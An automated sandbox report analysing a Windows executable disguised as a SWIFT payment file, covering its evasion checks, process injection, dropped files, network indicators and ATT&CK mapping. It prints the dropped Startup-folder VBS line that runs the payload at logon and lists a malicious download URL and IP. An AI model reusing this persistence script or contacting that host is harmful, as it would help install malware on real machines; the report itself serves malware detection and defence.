Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe PID: 6600, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.00000000030C7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Memory allocated: 14D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Memory allocated: 3040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Memory allocated: 4800000 memory reserve \| memory write watch	Jump to behavior

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2340446288.0000000005E70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MFWlHGfSsgGAbPLBUEs
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2340446288.0000000005E70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: xqEMuGLpV2OEgeHrJXY
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.00000000030C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.00000000030C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2319968821.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Memory written: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe base: 540000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Process created: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe "C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe"

Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Queries volume information: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Queries volume information: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	111 Process Injection	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	13%	ReversingLabs
10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe	13%	ReversingLabs

Source	Detection	Scanner	Label
http://xianggrhen.com	0%	Avira URL Cloud	safe
https://www.vintasoft.com	0%	Avira URL Cloud	safe
http://xianggrhen.com/composure/Emmaj.vdf	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xianggrhen.com	45.9.191.182	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://xianggrhen.com/composure/Emmaj.vdf	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-net	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://xianggrhen.com	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.0000000003041000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.vintasoft.com	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, VSImagingNet14_0-setup.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2320521719.0000000003041000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.9.191.182	xianggrhen.com	Germany		47583	AS-HOSTINGERLT	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572323
Start date and time:	2024-12-10 13:11:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
Detection:	MAL
Classification:	mal100.expl.evad.winEXE@4/3@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 165 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, PID 5280 because it is empty
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Simulations

Behavior and APIs

Time	Type	Description
13:12:21	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSImagingNet14_0-setup.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.9.191.182	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Get hash	malicious	Unknown	Browse	xianggrhen.com/composure/Vuglyxyuvio.pdf
	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Get hash	malicious	Unknown	Browse	xianggrhen.com/camp/Reibbfkkyy.dat
	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	xianggrhen.com/desk/Tbddfcris.vdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xianggrhen.com	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	AMTR-TT4781-SWFT-U4Y81-SO39-C37AR-AO937-CNR742-S3782-2818DY-9A82.exe	Get hash	malicious	Unknown	Browse	92.113.29.113

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-HOSTINGERLT	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	Employee_Letter.pdf	Get hash	malicious	HTMLPhisher	Browse	92.249.45.121
	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exe	Get hash	malicious	Unknown	Browse	45.9.191.182
	https://application-workspace.com/red-bull/id-38772	Get hash	malicious	Unknown	Browse	45.84.207.234
	https://clickme.thryv.com/ls/click?upn=u001.5-2B1Zlj-2BwCegXqgd6Um7kY0JRT8UgUE3u1rWR4YFASxlUU28BkvglW4Sw74FAirirfRSk_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQjRRfcuGnHeO06MZmpQ9Md6EqF3tHpTnJtwnRl07eBC-2BbeqGDZkqEsFQ9fh8CwKb92GLRs9xjA4K3L0qiP8u-2BrdM8wHoplpWV7e4Ic88yYySdEC6BFxZgKH7uN8ysaI5ELMcoW165-2BlUHwvAK7b88Y-2FPYUokK9PeBa-2FcZkvlS9nh3pVTeDrVNhWWvISMX1rFpeltySyG2xWyMwf0YLv9gS0X1AE0s7oDERqOcaTwfLsXQxoV99DX1bVNLU7d5FQCgc-3D#C?email=heath.teresa@aidb.org	Get hash	malicious	Unknown	Browse	31.170.162.164
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	46.17.173.161
	http://nemoinsure.com	Get hash	malicious	Unknown	Browse	195.110.59.5
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	31.170.162.164
	I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg	Get hash	malicious	Mint Stealer	Browse	195.110.59.166

Process:	C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	186952
Entropy (8bit):	4.1835470761545785
Encrypted:	false
SSDEEP:	1536:IimWbhxYrGGXp5KQ97B/Jtdo/RctjWWseK:qWtxYzKQ95ri/WtjWWseK
MD5:	1FBBB69B38CBD11F090850B982EDC780
SHA1:	7353EEBC22D5CB040CBCDA1FD357D0EC157BEFB0
SHA-256:	A98C622C391535DC0AABD1F8DFB186F92804D8A81E46EBDD44D8597B863112FA
SHA-512:	FACB33508240B09D772B9043ADB829C7E5F5E22CD50A9368CA112ABA6ACB39CADB030B626448C9E4216950AB244F37DF11F0CE35BB64EDBDFE1EF5CA357926F9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 13%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Xg.............................,... ...@....@.. ....................... ............`..................................,..J....@..................H............................................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc..............................@..B.................,......H........!..............................................................r+.+.+.(....+.(....+.o....+..........+.r...p+.+.+.+.+ (....+.(....+..+.(....+.(...++.o....+....0..........8....8....+hrM..p8d...8i...8n...r...p8j...8o....-..-.8n...o.......+..s....r...p(......-..,...&...-..,......io......D.8....(....8....o....8.....8....(....8....o....8.....8.....,..o......s....8A....8@...........E..]..................b+.+.+.(....+..+.o....+....Br...p+.&(....+......(....BSJB........

C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSImagingNet14_0-setup.vbs

Download File

Process:	C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	96
Entropy (8bit):	4.991910906899398
Encrypted:	false
SSDEEP:	3:FER/n0eFHHoUkh4E2J5zLIEurA5VIPinn:FER/lFHI923n5urGVIPO
MD5:	2887B7FA03B56A7D249966212C00F350
SHA1:	3E7976E1687A474BB95A4D53982F6067BC448EF0
SHA-256:	E2D5EFE18509C468862EC8B2A62B95EF3CA15FF1A899DDB59DD329227DFE8363
SHA-512:	D52BA67FE17AB1F4E6A07201DEC93DF96720C5E839370E7BA1165E3A62115D1890C57646FDB018A3084DB6A9CC9042AE0B9270D7AEF3F37CBDA16880EE0A87A1
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.1835470761545785
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe
File size:	186'952 bytes
MD5:	1fbbb69b38cbd11f090850b982edc780
SHA1:	7353eebc22d5cb040cbcda1fd357d0ec157befb0
SHA256:	a98c622c391535dc0aabd1f8dfb186f92804d8a81e46ebdd44d8597b863112fa
SHA512:	facb33508240b09d772b9043adb829c7e5f5e22cd50a9368ca112aba6acb39cadb030b626448c9e4216950ab244f37df11f0ce35bb64edbdfe1ef5ca357926f9
SSDEEP:	1536:IimWbhxYrGGXp5KQ97B/Jtdo/RctjWWseK:qWtxYzKQ95ri/WtjWWseK
TLSH:	B1042DE0EDD3E832C8D019FECA9E8214C429796E97A61D4066873B2C52F960DEDDC5F4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Xg.............................,... ...@....@.. ....................... ............`................................

File Icon


Icon Hash:	183c539a52680c02

Static PE Info

General

Entrypoint:	0x402cd2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67581196 [Tue Dec 10 10:01:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	28/06/2024 11:14:27 10/09/2027 11:43:36
Subject Chain	E=support@vintasoft.com, CN=VINTASOFT LTD, O=VINTASOFT LTD, L=Rostov-on-Don, S=Rostovskaya oblast, C=RU
Version:	3
Thumbprint MD5:	9BD844D8EB33262AC7634E5D0655E49E
Thumbprint SHA-1:	03DABAC406BF1B68BA0BD376CBC283E423374859
Thumbprint SHA-256:	EEF07A027D2EDB9CCABCFEA856FFA6046F0223FA4D712FF1845B0DA23509C3F6
Serial:	2FC9CCACCE8DB8E42F6B5146

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
